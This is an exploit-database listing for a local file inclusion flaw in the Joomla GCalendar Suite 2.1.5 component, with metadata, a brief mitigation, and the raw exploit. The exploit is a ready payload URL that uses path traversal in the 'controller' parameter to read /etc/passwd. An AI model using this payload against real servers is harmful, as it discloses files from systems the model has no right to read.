header-logo
Suggest Exploit
vendor:
GCalendar Suite
by:
jdc
7,5
CVSS
HIGH
Local File Include
98
CWE
Product Name: GCalendar Suite
Affected Version From: 2.1.5
Affected Version To: 2.1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:gcalendar_suite:2.1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla component GCalendar Suite 2.1.5 Local File Include

This vulnerability allows an attacker to include a file from the local system, such as the /etc/passwd file, by manipulating the 'controller' parameter in the URL. This can be exploited to disclose sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

Joomla component GCalendar Suite 2.1.5 Local File Include
Version     : 2.1.5
Author      : jdc
Download : 
http://g4j.laoneo.net/content/extensions/download/doc_details/28-gcalendar-suite-215.html

http://site/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00

jdc 2010

Navigation

Suggest Exploit

Services By CQR